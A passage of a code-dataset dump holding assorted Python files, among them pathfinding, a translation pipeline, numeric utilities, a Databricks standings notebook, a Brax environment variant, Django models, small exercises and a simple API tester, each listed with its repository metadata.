= 0\r\n orla = {o}\r\n while orla:\r\n v = min(orla, key=lambda x: dist[x])\r\n orla.remove(v)\r\n if v not in adj:\r\n adj[v] = {}\r\n\r\n # Criar as edges\r\n for m in moves:\r\n new_X = v[0]+m[0]\r\n new_Y = v[1]+m[1]\r\n new_coord = (new_X, new_Y)\r\n if (new_X >= 0 and new_X < len(mapa[0]) and new_Y >= 0 and new_Y < len(mapa)):\r\n altura = abs(int(mapa[v[1]][v[0]])-int(mapa[new_Y][new_X]))\r\n if new_X0:\r\n final.append(sorted(aux, key=lambda i:(i[3],i[1])).pop(0))\r\n\r\n #Criar a variavel final\r\n final=sorted(final, key=lambda i:(i[3],i[1])).pop(0)\r\n return (final[0],final[3])\r\n\r\n# self.assertEqual(travessia(mapa1),(2,10))\r\n# self.assertEqual(travessia(mapa2),(1,5))\r\n","repo_name":"rubensilva091/Python","sub_path":"LA2/Treino 2/travessia.py","file_name":"travessia.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42120880154","text":"from transformers import M2M100ForConditionalGeneration, M2M100Tokenizer\nfrom typing import List, Tuple\nfrom split_sentences import SplitSentence\n\n\nclass TranslationPipeline:\n def __init__(self) -> None:\n self.model = M2M100ForConditionalGeneration.from_pretrained(\n \"transZ/M2M_Vi_Ba\")\n self.tokenizer = M2M100Tokenizer.from_pretrained(\"transZ/M2M_Vi_Ba\")\n self.tokenizer.src_lang = \"vi\"\n\n def translate(self, sent: str) -> str:\n vi_text = sent\n encoded_vi = self.tokenizer(vi_text, return_tensors=\"pt\")\n generated_tokens = self.model.generate(\n **encoded_vi, forced_bos_token_id=self.tokenizer.get_lang_id(\"ba\"))\n ba_text = self.tokenizer.batch_decode(\n generated_tokens, skip_special_tokens=True)[0]\n return ba_text\n\n async def __call__(self, text: str) -> Tuple[List[str], List[str]]:\n vi_paragraphs = text.split('\\n')\n ba_paragraphs = []\n for paragraph in vi_paragraphs:\n sents = SplitSentence(paragraph)\n translated_sentences = [self.translate(\n sent) + \".\" for sent in sents]\n translated_paragraph = \" \".join(translated_sentences)\n ba_paragraphs.append(\n translated_paragraph if paragraph != '' else '')\n return vi_paragraphs, ba_paragraphs\n","repo_name":"TokisakiKurumi2001/M2M_fastAPI","sub_path":"pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42284687709","text":"import configparser\nimport glob\nimport os\nimport shutil\nimport struct\nimport time\nimport pickle\n\ndef timed_folder_name():\n name = time.asctime()\n for x in range(3): name = name.replace(' ', ' ')\n name = name.replace(' ', '_')\n name = name.replace(':', '_')\n return name\n\n\ndef copy_files(target, extension='.py'):\n files = glob.glob('*' + extension)\n for f in files:\n # print(f, '>'),\n src = os.path.join(os.getcwd(), f)\n tgt = target + '/' + f\n # print src, '>', tgt\n shutil.copy(src, tgt)\n\n\ndef copy_folder(src, target):\n try:\n shutil.rmtree(target)\n except shutil.Error as e:\n print(('Directory not copied. Error: %s' % e))\n try:\n shutil.copytree(src, target)\n except shutil.Error as e:\n print(('Directory not copied. Error: %s' % e))\n except OSError as e:\n print(('Directory not copied. Error: %s' % e))\n\n\ndef copy_library(target, src='library'):\n try:\n shutil.copytree(src, target)\n # Directories are the same\n except shutil.Error as e:\n print(('Directory not copied. Error: %s' % e))\n # Any error saying that the directory doesn't exist\n except OSError as e:\n print(('Directory not copied. Error: %s' % e))\n\n\ndef find_nearest(array, value):\n array = numpy.asarray(array)\n idx = (numpy.abs(array - value)).argmin()\n return array[idx]\n\n\ndef mat2array(matrix):\n array = numpy.array(matrix, dtype='f')\n array = numpy.squeeze(array)\n if array.shape == (): array = numpy.reshape(array, (1,))\n return array\n\n\ndef normalize_vector(vector):\n norm = numpy.linalg.norm(vector)\n if norm == 0: return vector\n x = vector / norm\n return x\n\n\ndef angle_between(v1, v2):\n v1 = numpy.reshape(v1, (1, -1))\n v2 = numpy.reshape(v2, (-1, 1))\n v1_u = normalize_vector(v1)\n v2_u = normalize_vector(v2)\n angle = numpy.arccos(numpy.clip(numpy.dot(v1_u, v2_u), -1.0, 1.0))\n angle = float(angle)\n angle = numpy.rad2deg(angle)\n if numpy.isnan(angle): return 90\n return angle\n\n\ndef signed_vector_angle(p1, p2):\n ang1 = numpy.arctan2(*p1[::-1])\n ang2 = numpy.arctan2(*p2[::-1])\n return numpy.rad2deg((ang1 - ang2) % (2 * numpy.pi))\n\n\ndef append2csv(data, path, sep=\",\"):\n import os\n if not os.path.isfile(path):\n data.to_csv(path, mode='a', index=False, sep=sep)\n else:\n data.to_csv(path, mode='a', index=False, sep=sep, header=False)\n\n\ndef scale_ranges(a, b, zoom_out=1.25):\n rng_a = numpy.ptp(a)\n rng_b = numpy.ptp(b)\n mean_a = numpy.mean(a)\n mean_b = numpy.mean(b)\n if rng_b > rng_a: a = (b - mean_b) + mean_a\n if rng_a > rng_b: b = (a - mean_a) + mean_b\n mean_a = numpy.mean(a)\n mean_b = numpy.mean(b)\n a = ((a - mean_a) * zoom_out) + mean_a\n b = ((b - mean_b) * zoom_out) + mean_b\n return a, b\n\n\ndef minmax(array):\n mn = numpy.nanmin(array)\n mx = numpy.nanmax(array)\n rng = numpy.array((mn, mx), dtype='f')\n return rng\n\n\ndef unwrap(angles):\n radians = numpy.deg2rad(angles)\n radians = numpy.unwrap(radians)\n angels = numpy.rad2deg(radians)\n return angels\n\n\ndef iterable(x):\n if isinstance(x, str): return False\n try:\n for t in x:\n break\n return True\n except:\n return False\n\n\ndef isstr(x):\n return isinstance(x, str)\n\n\ndef nan_array(shape):\n return numpy.full(shape, numpy.nan)\n\n\ndef rand_range(min_value, max_value, shape):\n y = numpy.random.random(shape)\n y = y * (max_value - min_value)\n y = y + min_value\n return y\n\n\ndef unit_vector(norm=1):\n return numpy.array([[0], [0], [1]], dtype='f') * norm\n\n\ndef closest(array, value):\n idx = (numpy.abs(array - value)).argmin()\n return array[idx], idx\n\n\ndef angle_arrays(az_range=180, el_range=90, step=2.5, grid=True):\n az_range = abs(az_range)\n el_range = abs(el_range)\n az = numpy.arange(-az_range, az_range + 0.001, step)\n az = numpy.transpose(az)\n el = numpy.arange(-el_range, el_range + 0.001, step)\n if not grid: return az, el\n az, el = numpy.meshgrid(az, el)\n return az, el\n\n\ndef random_cds(n, min_value, max_value, y_zero=True):\n points = numpy.random.rand(n, 3)\n r = max_value - min_value\n points = (points * r) + min_value\n x = points[:, 0]\n y = points[:, 1]\n z = points[:, 2]\n if y_zero: y = numpy.zeros(x.shape)\n return x, y, z\n\n\ndef corr2cov(sigma, corr):\n sigma = numpy.array(sigma, dtype='f')\n corr = numpy.array(corr, dtype='f')\n cov = corr * (numpy.transpose(sigma) * sigma)\n return cov\n\n\ndef almost_equal(a, b, threshold):\n diff = abs(a - b)\n if diff <= threshold: return True\n return False\n\n\ndef sign(x):\n if x < 0: return -1\n if x > 0: return 1\n if x == 0: return 0\n\n\ndef lst2command(lst):\n command = ''\n for x in lst: command += str(x) + ','\n command = command.rstrip(',')\n command += '*'\n return command\n\n\ndef lst2str(lst):\n if isinstance(lst, str): return lst\n text = ''\n for x in lst: text += str(x) + ' '\n text = text.rstrip(' ')\n return text\n\n\ndef contains(text, lst):\n for x in lst:\n if x in text: return True\n return False\n\n","repo_name":"dvanderelst/robot_server","sub_path":"library/Misc.py","file_name":"Misc.py","file_ext":"py","file_size_in_byte":5156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27360581092","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC # Produce Driver Standings\n\n# COMMAND ----------\n\ndbutils.widgets.text(\"p_file_date\", \"2021-03-21\")\nv_file_date = dbutils.widgets.get(\"p_file_date\")\n\n# COMMAND ----------\n\n# MAGIC %run \"../includes/configuration\"\n\n# COMMAND ----------\n\n# race_results_df = spark.read.parquet(f\"{presentation_folder_path}/race_results.parquet\")\n# race_results_df = spark.read.parquet(f\"{presentation_folder_path}/race_results\")\nrace_results_df = spark.read.format(\"delta\").load(f\"{presentation_folder_path}/race_results\").filter(f\"file_date = '{v_file_date}'\")\n\n# COMMAND ----------\n\nrace_results_df.show(5)\n\n# COMMAND ----------\n\nfrom pyspark.sql.window import Window\nfrom pyspark.sql import functions as f\n\n# COMMAND ----------\n\ndriver_standings_df = race_results_df.groupBy(\"race_year\", \"driver_name\", \"driver_nationality\", \"team\") \\\n .agg(f.sum(\"points\").alias(\"total_points\"), f.count(f.when(f.col(\"position\") == 1, True)).alias(\"wins\"))\n\n# COMMAND ----------\n\ndisplay(driver_standings_df.filter(\"race_year = 2020\"))\n\n# COMMAND ----------\n\ndriver_rank_spec = Window.partitionBy(\"race_year\").orderBy(f.desc(\"total_points\"), f.desc(\"wins\"))\n\n# COMMAND ----------\n\nfinal_df = driver_standings_df.withColumn(\"rank\", f.rank().over(driver_rank_spec))\n\n# COMMAND ----------\n\ndisplay(final_df.filter(\"race_year = 2020\"))\n\n# COMMAND ----------\n\n# final_df.write.mode(\"overwrite\").parquet(f\"{presentation_folder_path}/driver_standings.parquet\")\n# final_df.write.mode(\"overwrite\").format(\"parquet\").saveAsTable(\"f1_presentation.driver_standings\")\nmerge_condition = \"tgt.driver_name = src.driver_name AND tgt.race_id = src.race_id\"\nmerge_delta_data(final_df, 'f1_presentation', 'driver_standings', presentation_folder_path, merge_condition, 'race_id')","repo_name":"swarupmishal/Formula1-Racing-Project-using-PySpark-on-Databricks","sub_path":"transformations/2.driver_standings.py","file_name":"2.driver_standings.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1054874791","text":"from brax.envs.halfcheetah import Halfcheetah, _SYSTEM_CONFIG\nfrom google.protobuf import text_format\nimport brax\nfrom brax import jumpy as jp\nimport numpy as np\n\nenv_cfgs = {\n \"Normal\":{},\n \"BigFoot\":{\"foot\": 1.25},\n \"SmallFoot\":{\"foot\": 0.75},\n \"BigThig\":{\"thig\": 1.25},\n \"SmallThig\":{\"thig\": 0.75},\n \"BigShin\":{\"shin\": 1.25},\n \"SmallShin\":{\"shin\": 0.75},\n \"BigTorso\":{\"torso\": 1.25},\n \"SmallTorso\":{\"torso\": 0.75},\n \"SmallGravity\":{\"gravity\": 0.75},\n \"BigGravity\":{\"gravity\": 1.25},\n \"SmallFriction\":{\"friction\": 0.75},\n \"BigFriction\":{\"friction\": 1.25},\n \"TinyGravity\":{\"gravity\": 0.5},\n \"HugeGravity\":{\"gravity\": 1.5},\n \"TinyFriction\":{\"friction\": 0.5},\n \"HugeFriction\":{\"friction\": 1.5}\n}\n\nclass CustomHalfcheetah(Halfcheetah):\n \"\"\"Modified Halfcheetah environment (see test_cfgs)\"\"\"\n def __init__(self, env_cfg = \"Normal\", **kwargs):\n config = text_format.Parse(_SYSTEM_CONFIG, brax.Config())\n env_specs = env_cfgs[env_cfg]\n self.obs_mask = jp.concatenate(np.ones((1,23)))\n for spec,coeff in env_specs.items():\n if spec == \"gravity\":\n config.gravity.z *= coeff\n elif spec == \"friction\":\n config.friction *= coeff\n elif spec == \"obs_mask\":\n zeros = int(coeff*23)\n ones = 23-zeros\n np.random.seed(0)\n self.obs_mask = jp.concatenate(np.random.permutation(([0]*zeros)+([1]*ones)).reshape(1,-1))\n else:\n for body in config.bodies:\n if spec in body.name:\n body.mass *= coeff\n body.colliders[0].capsule.radius *= coeff\n self.sys = brax.System(config)\n\n def _get_obs(self, qp: brax.QP, info: brax.Info) -> jp.ndarray:\n \"\"\"Observe halfcheetah body position and velocities.\n obs_mask applied to simulate defective modules\"\"\"\n # some pre-processing to pull joint angles and velocities\n (joint_angle,), (joint_vel,) = self.sys.joints[0].angle_vel(qp)\n\n # qpos:\n # Z of the torso (1,)\n # orientation of the torso as quaternion (4,)\n # joint angles (8,)\n qpos = [qp.pos[0, 2:], qp.rot[0], joint_angle]\n\n # qvel:\n # velcotiy of the torso (3,)\n # angular velocity of the torso (3,)\n # joint angle velocities (8,)\n qvel = [qp.vel[0], qp.ang[0], joint_vel]\n #print(jp.concatenate(qpos + qvel))\n #print(self.obs_mask)\n #print(jp.concatenate(qpos + qvel) * self.obs_mask)\n return jp.concatenate(qpos + qvel) * self.obs_mask","repo_name":"facebookresearch/salina","sub_path":"salina_examples/rl/subspace_of_policies/envs/halfcheetah.py","file_name":"halfcheetah.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","stars":426,"dataset":"github-code","pt":"78"} +{"seq_id":"69880745852","text":"import unittest\nfrom unittest import mock\n\nBUFF_SIZE = 1024\n\ndef download(response, output):\n total_downloaded = 0\n while True:\n data = response.read(BUFF_SIZE)\n total_downloaded += len(data)\n if not data:\n break\n output.write(data)\n print('Downloaded {bytes}'.format(bytes=total_downloaded))\n\n\nclass DownloadTest(unittest.TestCase):\n def test_download_with_no_length(self):\n response = mock.MagicMock()\n response.read = mock.MagicMock(side_effect=['data', 'more data', ''])\n\n output = mock.MagicMock()\n output.write = mock.MagicMock()\n\n download(response, output)\n\n calls = [mock.call(BUFF_SIZE),\n mock.call(BUFF_SIZE),\n mock.call(BUFF_SIZE)]\n\n response.read.assert_has_calls(calls)\n\n calls = [mock.call('data'),\n mock.call('more data')]\n\n output.write.assert_has_calls(calls)\n","repo_name":"felipecruz/exemplos","sub_path":"08_12_download_mock2.py","file_name":"08_12_download_mock2.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"78"} +{"seq_id":"7639117911","text":"from django.db import models\n# models\nfrom posting.models import PostProject, PostJobs\n\nclass CommentProjects(models.Model):\n post_project = models.ForeignKey(PostProject, on_delete=models.CASCADE, related_name='post_project_comment')\n user_post = models.ForeignKey(\"accounts.Account\", on_delete=models.CASCADE, related_name='user_post')\n body = models.TextField()\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return str(self.user_post)\n\n class Meta:\n verbose_name = 'Comment'\n verbose_name_plural = 'Comment Projects'\n ordering = ['-updated']\n\nclass CommentJobs(models.Model):\n post_job = models.ForeignKey(PostJobs, on_delete=models.CASCADE, related_name='post_job_comment')\n user_job = models.ForeignKey(\"accounts.Account\", on_delete=models.CASCADE, related_name='user_job')\n body = models.TextField()\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return str(self.user_job)\n\n class Meta:\n verbose_name = 'Comment'\n verbose_name_plural = 'Comment Jobs'\n ordering = ['-updated']","repo_name":"marouane-youssfi10/build-social-networking-with-django","sub_path":"comment/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"36766252175","text":"def right(numbers, length):\r\n return numbers[-length:]\r\n\r\n\r\nnumbers = input().split(\"|\")\r\nnumbers = list(map(int, numbers))\r\n\r\nplayer_hp = 0\r\n\r\nline = input()\r\n\r\nwhile line != \"Game over\":\r\n command_line = line.split(\"@\")\r\n command = command_line[0]\r\n\r\n if command == \"Shoot Left\":\r\n start_index = int(command_line[1])\r\n length = int(command_line[2])\r\n if start_index > len(numbers)-1:\r\n pass\r\n else:\r\n index_to_shoot = start_index+length+1\r\n if index_to_shoot < len(numbers) - 1:\r\n shoot_attack = numbers[index_to_shoot] - 5\r\n player_hp+=5\r\n if shoot_attack < 5:\r\n numbers[index_to_shoot] = 0\r\n else:\r\n numbers[index_to_shoot] = shoot_attack\r\n\r\n # if start_index >= 0 and start_index < len(numbers):\r\n # current_target = numbers[start_index]\r\n # current_target -= lenght\r\n # da proverq dali ne izliza ot granici....\r\n\r\n elif command == \"Shoot Right\":\r\n start_index = int(command_line[1]) #4\r\n length = int(command_line[2]) # 5\r\n if start_index > len(numbers) - 1:\r\n pass\r\n else:\r\n right(numbers, length)\r\n index_to_shoot = start_index - length + 1\r\n if index_to_shoot < len(numbers) - 1:\r\n shoot_attack = numbers[index_to_shoot] - 5\r\n player_hp += 5\r\n if shoot_attack < 5:\r\n numbers[index_to_shoot] = 0\r\n else:\r\n numbers[index_to_shoot] = shoot_attack\r\n\r\n elif command == \"Reverse\":\r\n numbers.reverse() ###da go proverq\r\n\r\n line = input()\r\n\r\n\r\nnumbers = list(map(str, numbers))\r\noutput = \" - \".join(numbers)\r\nprint(output)","repo_name":"karolina-eledzhikova/Programming-Fundamentals-with-Python-","sub_path":"Fundamentals_ Exams/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12204354438","text":"import io, sys, string\n\ndef testaStringCheia(string, modo): # (string, 1) é meu preferido\n\t\n\tteste = None\n\tlista_teste = []\n\t\n\tprint(type(string))\n\n\tif isinstance(string, str): #saber se tá vazio\n\t\tfor letra in string:\n\t\t\tlista_teste.append(bool(letra))\n\t\t\t\n\t\t\tif letra != \" \":\n\t\t\t\tteste = True\n\t\t\t\n\t\t\tif modo == 1 : # limitar string apenas a segurar letras, sem numeros\n\t\t\t\t\n\t\t\t\tif letra.isnumeric() == True :\n\t\t\t\t\t#print(letra.isnumeric)\n\t\t\t\t\tteste = False\n\t\t\t\t\t\n\t\t\telse:\n\t\t\t\tteste = False\n\t\t\t\t\n\t\t\n\t\tprint(lista_teste)\n\t\t#for booleano in lista_teste:\n\t\t#\tif booleano == True:\n\t\t#\t\tprint(booleano + \" não é vazio.\")\n\t\t\t\t\t\n\t\t\n\t\t\t\t\n\telse:\n\t\tprint(\"[DEBUG] testeStringCheia diz que você entrou com:\")\n\t\tprint(type(string))\t\t\n\t\t\n\t\t\n\tif teste == True :\n\t\tprint(\"[DEBUG] testaStringCheia() = True\")\n\t\treturn True\n\t\t\n\t\t\n\telse:\n\t\tprint(\"[DEBUG] testaStringCheia() = False\")\n\t\treturn False\t\n\n\n\ndef main():\n\ttestaStringCheia(input(\"Entre com uma string:\\n --> \") , 1)\t\t\t\n\n\n\t\t\t\nif __name__ == '__main__':\n main()\n\n\n\n\n\n","repo_name":"requeijaum/simulador_matricula_ifba_2018","sub_path":"testaStringCheia.py","file_name":"testaStringCheia.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"32233661417","text":"\"\"\"\n선형 탐색 변형 (Sentinel Linear Search)\n기존의 선형탐색의 변형된 탐색 알고리즘이다. 탐색을 진행하고자하는 배열의 끝에 타겟 값을 붙이고,\nwhile 루프를 사용해 배열을 순차적으로 탐색을 하게 된다. 타겟 값이 있는 경우 while 문에서 빠져\n나오게된다. while 문을 사용하기 때문에 기존의 선형탐색보다 N번 적은 비교횟수가 일어나게 된다.\n\"\"\"\nfrom __future__ import print_function\n\ntry:\n raw_input # Python 2\nexcept NameError:\n raw_input = input # Python 3\n\n#선형탐색\ndef sentinel_linear_search(sequence, target):\n \"\"\"\n :param sequence : 탐색을 진행할 배열\n :param target : 탐색할 키(key) ���\n ;return : 키 값이 있는 위치(index), 없을 경우 None\n \"\"\"\n sequence.append(target)\n\n index = 0\n \n while sequence[index] != target:\n index += 1\n\n sequence.pop()\n\n if index == len(sequence):\n return None\n\n return index\n\n\nif __name__ == '__main__':\n user_input = raw_input('Enter numbers separated by comma:\\n').strip()\n sequence = [int(item) for item in user_input.split(',')]\n\n target_input = raw_input('Enter a single number to be found in the list:\\n')\n target = int(target_input)\n result = sentinel_linear_search(sequence, target)\n if result is not None:\n print('{} found at positions: {}'.format(target, result))\n else:\n print('Not found')\n","repo_name":"18-2-SKKU-OSS/2018-2-OSS-E5","sub_path":"searches/1-1. sentinel_linear_search.py","file_name":"1-1. sentinel_linear_search.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"ko","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"1764168612","text":"from typing import List\n\n\nclass Solution:\n def matrixReshape(self, mat: List[List[int]], r: int, c: int) -> List[List[int]]:\n n, m = len(mat), len(mat[0])\n if n*m != r*c:\n return mat\n curr = 0\n ans = [[1001 for _ in range(c)] for _ in range(r)]\n for i, row in enumerate(mat):\n for j, cell in enumerate(row):\n a, b = curr//c, curr % c\n ans[a][b] = cell\n curr += 1\n return ans\n\n\nprint(Solution().matrixReshape([[1, 2], [3, 4]], 4, 1))\n","repo_name":"andylilfs0217/leet_code","sub_path":"easy/0566_reshape_the_matrix.py","file_name":"0566_reshape_the_matrix.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"36255813910","text":"import pygame\nfrom game_info import *\n\npygame.font.init()\ndef scale_image(img, factor):\n size = round(img.get_width() * factor), round(img.get_height() * factor)\n return pygame.transform.scale(img, size)\n\ndef blit_rotate_center(win, image, top_left, angle):\n rotated_image = pygame.transform.rotate(image, angle)\n new_rect = rotated_image.get_rect(\n center=image.get_rect(topleft=top_left).center)\n win.blit(rotated_image, new_rect.topleft)\n\n\ndef blit_text_center(win, font, text):\n render = font.render(text, 1, (200, 200, 200))\n win.blit(render, (win.get_width()/2 - render.get_width() /\n 2, win.get_height()/2 - render.get_height()/2))\n\ndef draw(win,map,player_car1,player_car2,game_info,MAIN_FONT):\n\timages = map.get_images()\n\tfor k in images:\n\t\tval = images[k]\n\t\tif k == 'finish':\n\t\t\tblit_rotate_center(win,val[0], val[1], 90 - val[2])\n\t\telse:\n\t\t\twin.blit(val[0],val[1])\n\tlevel_text = MAIN_FONT.render(\n f\"Round {game_info.round}\", 1, (255, 255, 255))\n\twin.blit(level_text, (10, win.get_height() - level_text.get_height() - 70))\n\n\ttime_text = MAIN_FONT.render(\n f\"Time: {game_info.get_round_time()}s\", 1, (255, 255, 255))\n\twin.blit(time_text, (10, win.get_height() - time_text.get_height() - 40))\n \n\tplayer_car1.draw(win)\n\tplayer_car2.draw(win)\n\tpygame.display.update()\n\n \n ","repo_name":"quangzp/racing-game","sub_path":"code/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18494136722","text":"import unittest\nimport requests\n\n'''\nThis code takes input dict as the input endpoints that need to be tested.\n\nPicks each testcase one by one and then takes the expected status code and api status code and\ncompares the same to check if fails or pass\n\nAdd assert_code param to the input to compare its return code\n\n\n'''\n\n\nclass APITest():\n def __init__(self, input):\n\n # Converting input dict to Class attributes\n self.__dict__ = input\n\n def get_request(self, url ):\n\n return requests.get(url)\n\n def post_request(self , url , body):\n return requests.post(url , body = body)\n\n\n def start_test(self):\n print(\"Starting Testing for {}\".format(self.base_url + self.endpoint))\n\n #Depending on the method in the configuration it will either post a request or get the request\n\n if self.method == 'get':\n response = self.get_request(self.base_url + self.endpoint)\n\n if self.method == 'post':\n response = self.post_request(self.base_url + self.endpoint)\n\n #response = requests.get(self.base_url + self.endpoint)\n\n if hasattr(self, 'assert_code'):\n print(\"Testing of Status Code\")\n rsp = response.status_code\n\n if self.assert_code == str(rsp):\n print(\"Tescase Passed\")\n\n else:\n print(\"Testcase Failed\")\n\n if hasattr(self, 'assert_res'):\n '''\n If some passed to assert response also then we can implement this \n '''\n pass\n\n if hasattr(self, 'assert_schema'):\n '''\n if some passed to assert the schema then we can implement this \n '''\n pass\n\n\n\n\nif __name__ == \"__main__\":\n\n input = [{\n 'base_url': 'http://dummy.restapiexample.com/api/v1/',\n 'endpoint': 'employee/81988',\n 'method' : 'get',\n 'type': 'json',\n 'assert_key': 'employee_salary',\n 'assert_code': \"406\",\n\n },\n {\n 'base_url': 'http://dummy.restapiexample.com/api/v1/',\n 'endpoint': 'employees/212',\n 'type': 'json',\n 'method' : 'get',\n 'assert_code': \"406\",\n\n },\n\n {\n 'base_url': 'http://dummy.restapiexample.com/api/v1/',\n 'endpoint': 'employees',\n 'type': 'json',\n 'assert_code': \"406\",\n\n },\n\n {\n 'base_url' : 'http://localhost:8080',\n 'endpoint' : '/post',\n 'method' : 'post',\n 'body' : '{\"key\":\"test\" , \"value\" : \"2\"}',\n 'assert_code' : '200'\n },\n {\n 'base_url': 'http://localhost:8080',\n 'endpoint': '/get/test',\n 'method': 'get',\n 'assert_code': '200'\n }\n\n ]\n\n for each in input:\n print(each)\n Test_obj = APITest(each)\n\n Test_obj.start_test()\n","repo_name":"saurabh1326/grofers","sub_path":"tests/Api_Test.py","file_name":"Api_Test.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34267021589","text":"import matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\nimport os\n\nCOLORS = list(mcolors.TABLEAU_COLORS)\n\n\ndef plot_data(title: str, data: list, labels: list, path=\"images/\"):\n print(path + title)\n epochs = range(1, len(data[0]) + 1)\n for i, data_group in enumerate(data):\n plt.plot(epochs, data_group, COLORS[i], label=labels[i])\n plt.title(title)\n plt.xlabel(\"Epochs\")\n plt.ylabel(\"Loss\")\n plt.legend()\n directory = os.path.dirname(path)\n if not os.path.exists(directory):\n os.mkdir(directory)\n plt.savefig(f\"{path+title}.png\", bbox_inches=\"tight\")\n plt.close()\n\n\ndef plot_hist(title: str, data: list, path=\"images/\"):\n print(path + title)\n plt.hist(data, bins=243)\n plt.title(title)\n plt.xlabel(\"Result\")\n plt.ylabel(\"Count\")\n plt.legend()\n directory = os.path.dirname(path)\n if not os.path.exists(directory):\n os.mkdir(directory)\n plt.savefig(f\"{path+title}.png\", bbox_inches=\"tight\")\n plt.close()\n\n\ndef plot_q_values(title: str, data: list, action_labels: list, path=\"images/\"):\n print(path + title)\n print(f\"data dimensions: {data.shape}\")\n print(f\"action_labels: {len(action_labels)}\")\n M = data.shape[0]\n amount = M\n epochs = range(amount)\n fig, axs = plt.subplots(len(action_labels))\n barWidth = 1\n for i in range(len(action_labels)):\n axs[i].plot(\n epochs,\n data[:, i],\n color=COLORS[i],\n label=action_labels[i],\n # width=barWidth,\n )\n axs[i].grid(True)\n axs[i].set_title(f\"{action_labels[i]}\")\n # axs[i].set_xlabel('Epochs')\n # axs[i].set_ylabel('Frequency')\n axs[i].legend(loc=\"center left\", bbox_to_anchor=(1, 0.5))\n fig.subplots_adjust(hspace=1)\n fig.savefig(f\"{path+title}.png\", bbox_inches=\"tight\")\n # plt.title(title)\n # plt.xlabel('Epochs')\n # plt.ylabel('Frequency')\n # plt.legend()\n plt.close()\n\n\ndef plot_frequencies(title: str, data: list, action_labels: list, path=\"images/\"):\n print(path + title)\n print(f\"data dimensions: {data.shape}\")\n print(f\"action_labels: {len(action_labels)}\")\n M = data.shape[0]\n amount = M\n epochs = range(amount)\n fig, axs = plt.subplots(1)\n fig.suptitle(\"Frequencies\")\n barWidth = 1\n if len(action_labels) == 5:\n axs.bar(\n epochs,\n data[:, 0][:amount],\n color=COLORS[0],\n label=action_labels[0],\n width=barWidth,\n )\n axs.bar(\n epochs,\n data[:, 1][:amount],\n bottom=data[:, 0][:amount],\n color=COLORS[1],\n label=action_labels[1],\n width=barWidth,\n )\n axs.bar(\n epochs,\n data[:, 2][:amount],\n bottom=[i + j for i, j in zip(data[:, 0][:amount], data[:, 1][:amount])],\n color=COLORS[2],\n label=action_labels[2],\n width=barWidth,\n )\n axs.bar(\n epochs,\n data[:, 3][:amount],\n bottom=[\n i + j + k\n for i, j, k in zip(\n data[:, 0][:amount], data[:, 1][:amount], data[:, 2][:amount]\n )\n ],\n color=COLORS[3],\n label=action_labels[3],\n width=barWidth,\n )\n axs.bar(\n epochs,\n data[:, 4][:amount],\n bottom=[\n i + j + k + l\n for i, j, k, l in zip(\n data[:, 0][:amount],\n data[:, 1][:amount],\n data[:, 2][:amount],\n data[:, 3][:amount],\n )\n ],\n color=COLORS[4],\n label=action_labels[4],\n width=barWidth,\n )\n else:\n raise ValueError(f\"{len(action_labels)} Number of actions not supported\")\n axs.grid(True)\n axs.set_title(f\"word values\")\n # axs.set_xlabel('Epochs')\n # axs.set_ylabel('Frequency')\n axs.legend(loc=\"center left\", bbox_to_anchor=(1, 0.5))\n # axs.legend(loc='upper center', bbox_to_anchor=(0.5, -0.05),\n # fancybox=True, shadow=True, ncol=5)\n # axs.legend()\n fig.subplots_adjust(hspace=1)\n fig.savefig(f\"{path+title}.png\", bbox_inches=\"tight\")\n # plt.title(title)\n # plt.xlabel('Epochs')\n # plt.ylabel('Frequency')\n # plt.legend()\n plt.close()\n","repo_name":"Morgan-Griffiths/wordle","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":4423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"71756147772","text":"import logging\nfrom collections import OrderedDict\nimport yaml\n\nlogger = logging.getLogger('cluster_node')\n\nclass ElasticSearchConfig(OrderedDict):\n def __init__(self, cluster, config_file=\"/etc/elasticsearch/elasticsearch.yml\"):\n self.config_file = config_file\n with open(config_file) as f:\n super(ElasticSearchConfig, self).__init__(sorted(yaml.safe_load(f.read()).items()))\n self['cluster']['name'] = cluster.elastic_search_cluster_name\n self['node']['roles'] = []\n if cluster.is_data:\n self['node']['roles'].append('data')\n if cluster.is_master:\n self['node']['roles'].append('master')\n if cluster.tags.get('initial_master', 'False') == 'True':\n self['cluster']['initial_master_nodes'] = [cluster.instance_id]\n\n def save(self):\n \"\"\"\n 